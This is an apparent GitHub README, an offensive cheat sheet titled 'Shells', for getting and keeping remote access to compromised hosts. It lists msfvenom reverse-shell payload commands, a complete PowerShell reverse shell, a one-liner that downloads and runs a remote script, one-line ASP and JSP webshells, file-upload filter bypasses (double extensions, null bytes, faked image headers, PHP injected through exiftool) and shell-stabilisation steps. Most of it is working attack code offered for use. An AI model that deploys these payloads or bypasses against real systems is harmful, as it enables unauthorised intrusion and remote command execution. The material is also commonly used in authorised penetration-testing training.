└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # Shells 2 | 3 | ## Table of contents 4 | 5 | ##### ➤ Shells 6 | 7 | * [Reverse shell](#reverse-shell) 8 | * [One liner](#one-liner) 9 | * [Webshell](#webshell) 10 | * [Online generator](#online-generator) 11 | 12 | ##### ➤ Upload bypass 13 | 14 | * [Rename the extension](#rename-the-extension) 15 | * [Bypass the extension checks](#bypass-the-entension-checks) 16 | * [Bypass using the content-type](#bypass-using-the-content-type) 17 | * [Magic number](#magic-number) 18 | 19 | 20 | ##### ➤ Shell Stabilisation 21 | 22 | * [Technique 01: Python](#technique-01-python) 23 | * [Technique 02: Rlwrap](#technique-02-rlwrap) 24 | * [Technique 03: Socat](#technique-03-socat) 25 | 26 | 27 | 28 | # 29 | # ⭕ Shells 30 | 31 | ## 🔻Reverse shell 32 | 33 | #### ➤ Linux - MSFVenom 34 | ``` 35 | msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf 36 | msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf 37 | ``` 38 | 39 | #### ➤ Windows - MSFVenom 40 | ``` 41 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe 42 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe 43 | ``` 44 | 45 | #### ➤ Powershell 46 | ``` 47 | powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.194',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 48 | ``` 49 | 50 | #### ➤ ASP 51 | ``` 52 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp 53 | ``` 54 | 55 | #### ➤ ASPX 56 | ``` 57 | msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx 58 | ``` 59 | 60 | #### ➤ JSP 61 | ``` 62 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 63 | ``` 64 | 65 | #### ➤ WAR 66 | ``` 67 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 68 | ``` 69 | 70 | #### ➤ PHP 71 | ``` 72 | msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php 73 | ``` 74 | 75 | #### ➤ HTA 76 | ``` 77 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f hta-psh > shell.hta 78 | ``` 79 | 80 | #### ➤ DLL 81 | ``` 82 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f dll > shell.dll 83 | ``` 84 | 85 | #### ➤ Upload and execution 86 | ``` 87 | # This reverse shell download a reverse shell name Invoke-PowerShellTcp.ps1 and execute it to obtain a reverse shell 88 | # Reverse shell : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 89 | # Raw direct link : https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 90 | powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1:4444/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.1 -Port 443 91 | ``` 92 | 93 | 94 | ## 🔻Single line Webshell 95 | 96 | #### ➤ PHP 97 | ``` 98 | 99 | 100 | ``` 101 | 102 | #### ➤ ASP 103 | ``` 104 | <% eval request("cmd") %> 105 | ``` 106 | 107 | #### ➤ JSP 108 | ``` 109 | <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> 110 | ``` 111 | 112 | 113 | 114 | ## 🔻Online Generator 115 | https://www.revshells.com/ 116 | https://weibell.github.io/reverse-shell-generator/ 117 | 118 | # 119 | # ⭕ Upload Bypass 120 | 121 | ## 🔻Rename the extension 122 | ``` 123 | • PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module 124 | 125 | • PHP8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp 126 | 127 | • ASP: asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml 128 | 129 | • PERL: .pl, .pm, .cgi, .lib 130 | 131 | • JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action 132 | 133 | • Coldfusion: .cfm, .cfml, .cfc, .dbm 134 | 135 | • Flash: .swf 136 | 137 | • Erlang Yaws Web Server: .yaws 138 | ``` 139 | 140 | ## 🔻Bypass the extension checks 141 | 142 | #### ➤ Using some uppercase letters 143 | ``` 144 | pHp, .pHP5, .aSPx, .jSp ... 145 | ``` 146 | 147 | #### ➤ Adding a valid extension before 148 | 149 | • As example, if the png are the only authorized extension: 150 | ``` 151 | reverseshell.png.php 152 | ``` 153 | 154 | • It is also possible to use the the uppercase letters 155 | ``` 156 | reverseshell.png.Php5 157 | reverseshell.png.pHTml 158 | ``` 159 | 160 | #### ➤ Add special characters at the end 161 | 162 | • Some examples 163 | ``` 164 | reverseshell.php%20 165 | reverseshell.php%0a 166 | reverseshell.php%00 167 | reverseshell.php%0d%0a 168 | reverseshell.php/ 169 | reverseshell.php.\ 170 | reverseshell. 171 | reverseshell.php.... 172 | ``` 173 | 174 | • It is also possible to combine with the previous bypass 175 | ``` 176 | reverseshell.php5%0a 177 | reverseshell.pHP5%0a 178 | ``` 179 | 180 | #### ➤ Add a double extension and a junk data between them 181 | 182 | • Some examples 183 | ``` 184 | reverseshell.php#.png 185 | reverseshell.php%00.png 186 | reverseshell.php\x00.png 187 | reverseshell.php%0a.png 188 | reverseshell.php%0d%0a.png 189 | reverseshell.phpJunk123png 190 | ``` 191 | 192 | • It is also possible to combine with the uppercase 193 | ``` 194 | reverseshell.png%00pHp5 195 | ``` 196 | 197 | #### ➤ Add another layer of extensions 198 | 199 | • Some examples 200 | ``` 201 | file.png.jpg.php 202 | ``` 203 | 204 | • It is also possible to combine with the uppercase 205 | ``` 206 | file.php%00.png%00.jpg 207 | file.pHp%00.pNg%00.jPg 208 | ``` 209 | 210 | ## 🔻Bypass using the content-type 211 | 212 | Example of content-type : 213 | - image/jpeg 214 | - application/pdf 215 | 216 | #### ➤ 1. Initial request (upload of php reverse shell) 217 | 218 | ![image](https://github.com/Kiosec/Shells/assets/100965892/609150ce-69ac-4769-99cf-155e9d78eeae) 219 | 220 | 221 | #### ➤ 2. Burp interception and modification 222 | 223 | ![image](https://github.com/Kiosec/Shells/assets/100965892/27a84575-0816-419b-86da-3d2972badfb5) 224 | 225 | 226 | ## 🔻Magic number 227 | 228 | An image is identified by its first bytes. It is possible to hide a webshell by including a valid img header at the beginning of the webshell file. 229 | 230 | #### ➤ GIF 231 | ``` 232 | Basically you just add the text "GIF89a;" before you shell-code. As exemple : 233 | 234 | GIF89a; 235 | 238 | ``` 239 | 240 | #### ➤ JPEG 241 | ``` 242 | printf "\xff\xd8\xff\xe0" > image?jpg 243 | ``` 244 | 245 | #### ➤ Inject PHP code into into information/comment of the image 246 | ``` 247 | exiftool -Comment='"; system($_GET['cmd']); ?>' image.jpg 248 | ``` 249 | 250 | 251 | 252 | # 253 | # ⭕ Shell Stabilisation 254 | 255 | ## 🔻Technique 01: Python 256 | ``` 257 | ➤ Step 01 : uses Python to spawn a better featured bash shell 258 | python -c 'import pty;pty.spawn("/bin/bash")' 259 | 260 | ➤ Step 02: this will give us access to term commands such as clear 261 | export TERM=xterm 262 | 263 | ➤ Step 03: background the shell using Ctrl + Z 264 | CRTL+Z 265 | 266 | ➤ Step 04: Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process. 267 | stty raw -echo; fg 268 | 269 | Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter. 270 | 271 | ➤ Example: 272 | kiosec@lab:~$ nc -lvnp 443 273 | listening on [any] 443 ... 274 | connect to [10.0.0.1] from (unknown) [10.1.1.1] 43298 275 | 276 | python3 -c 'import pty;pty.spawn("/bin/bash")' 277 | user@box:~$ export TERM=xterm 278 | export TERM=xterm 279 | user@box:~$ ^Z 280 | [1]+ Stopped sudo nc -lvnp 443 281 | kiosec@lab:~$ stty rauw -echo; fg 282 | nc -lvnp 443 283 | 284 | user@box:~$ whoami 285 | user 286 | user@box:~$ ^C 287 | user@box:~$ 288 | ``` 289 | 290 | ## 🔻Technique 02: Script 291 | ``` 292 | $ script /dev/null -c bash 293 | Script started, output log file is '/dev/null'. 294 | kiosec@mycyberlab:/home/kiosec$ 295 | ``` 296 | 297 | ## 🔻Technique 03: Rlwrap 298 | rlwrap gives a more fully featured shell including access to history, tab autocompletion and the arrow keys immediately upon receiving a shell. 299 | This technique is particularly useful with the Windows shell. 300 | 301 | ``` 302 | ➤ Step 01: Install rlwrap (not installed by default on the kali) 303 | apt install rlwrap 304 | 305 | ➤ Step 02: Invoke the listener. 306 | rlwrap nc -lnvp 307 | 308 | [additional steps for Linux target] 309 | ➤ Step 03: background the shell using Ctrl + Z 310 | CRTL+Z 311 | 312 | ➤ Step 04: Back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process. 313 | stty raw -echo; fg 314 | ``` 315 | 316 | ## 🔻Technique 03: Socat 317 | Restricted to Linux target 318 | 319 | ``` 320 | ➤ Prerequisite: Obtain Socat on the linux target. 321 | 322 | ➤ Step 01: Transfer a socat static compiled binary (e.g., using python http.server) 323 | https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true 324 | 325 | ➤ Step 02: On the Kali 326 | socat TCP-L: FILE:`tty`,raw,echo=0 327 | 328 | ➤ Step 03: execute the reverse shell on the target. 329 | 330 | ➤ Step 04: Once connected to the target, execute the sepcial socal command in order to 331 | socat TCP:: EXEC:"bash -li",pty,stderr,sigint,setsid,sane 332 | ``` 333 | --------------------------------------------------------------------------------